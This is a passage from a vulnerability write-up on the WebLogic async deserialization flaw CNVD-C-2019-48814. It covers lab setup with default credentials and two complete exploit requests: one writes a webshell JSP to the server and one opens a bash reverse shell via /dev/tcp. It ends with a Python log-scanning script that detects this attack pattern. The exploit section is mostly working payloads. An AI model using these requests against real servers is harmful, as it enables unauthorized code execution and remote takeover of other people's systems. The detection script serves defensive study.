WebLogic Deserialization Vulnerability CNVD-C-2019-48814


title: 'WebLogic Deserialization Vulnerability CNVD-C-2019-48814'
date: Mon, 31 Aug 2020 10:01:23 +0000
draft: false
tags: ['白阁-漏洞库']

### Affected versions

WebLogic 10.\* / WebLogic 12.1.3.0

### Setting up the environment with Docker

```
docker pull ismaleiva90/weblogic12
docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
```

http://localhost:49163/console User: weblogic Pass: welcome1

http://192.168.247.129:49163/_async/AsyncResponseService

![](/static/baige/06-中间件框架漏洞/Weblogic/https://www.bylibrary.cn/wp-content/uploads/2020/08/10.jpg)

Confirm that the target system exposes the `/_async/AsyncResponseService` path externally; if it does, the vulnerability is present.

Writing the shell

```
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.247.129:49163
Content-Length: 1383
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml



xx
xx




/bin/bash


-c


echo [base64 payload omitted] |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp








```

![](/static/baige/06-中间件框架漏洞/Weblogic/https://www.bylibrary.cn/wp-content/uploads/2020/08/20.jpg)

Commands can now be executed here. Next, we try a reverse shell.

```
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.247.129:49164
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml



xx
xx




/bin/bash


-c


bash -i >& /dev/tcp/192.168.247.129/12345 0>&1








```

![](/static/baige/06-中间件框架漏洞/Weblogic/https://www.bylibrary.cn/wp-content/uploads/2020/08/QQ截图20200831175258.jpg) ![](/static/baige/06-中间件框架漏洞/Weblogic/https://www.bylibrary.cn/wp-content/uploads/2020/08/QQ截图20200831175205.jpg)
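Both requests above are POSTs to `/_async/AsyncResponseService`, and the first one writes a JSP into the `bea_wls9_async_response` war directory. The following detection script is an added example, not part of the original write-up: it flags those two patterns in an access log and correlates them per client. The Common Log Format layout, the sample lines, and the assumption that the war directory is served under the `/_async/` path are mine.

```python
import re
from collections import defaultdict

# Assumed log layout: Common Log Format (adjust the regex to your access.log).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines for illustration, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Aug/2020:10:01:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3211
10.0.0.9 - - [31/Aug/2020:10:02:10 +0000] "GET /_async/AsyncResponseService HTTP/1.1" 200 512
10.0.0.9 - - [31/Aug/2020:10:02:40 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0
10.0.0.9 - - [31/Aug/2020:10:03:05 +0000] "GET /_async/webshell.jsp HTTP/1.1" 200 48
10.0.0.7 - - [31/Aug/2020:10:04:00 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 404 0
truncated line that does not parse
"""

def classify(method, path):
    """Label a request that touches the async component, else return None."""
    p = path.split("?", 1)[0].split(";", 1)[0].lower()  # drop query and path params
    if not p.startswith("/_async/"):
        return None
    if p.endswith((".jsp", ".jspx")):
        return "jsp-under-async"
    return "post-to-async" if method == "POST" else "async-probe"

def scan(log_text):
    """Return {client_ip: [(label, status, path), ...]} in log order."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (label := classify(m["method"], m["path"])):
            findings[m["ip"]].append((label, int(m["status"]), m["path"]))
    return dict(findings)

def likely_compromised(findings):
    """Clients whose accepted POST was later followed by a successful JSP fetch."""
    hits = []
    for ip, events in findings.items():
        posts = [i for i, (lab, st, _) in enumerate(events) if lab == "post-to-async" and st < 400]
        jsps = [i for i, (lab, st, _) in enumerate(events) if lab == "jsp-under-async" and st == 200]
        if posts and jsps and min(posts) < max(jsps):
            hits.append(ip)
    return hits

if __name__ == "__main__":
    print(likely_compromised(scan(SAMPLE_LOG)))
```

A client returned by `likely_compromised` is a reason to inspect the `bea_wls9_async_response` war directory on disk for JSP files that are not part of the deployment.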
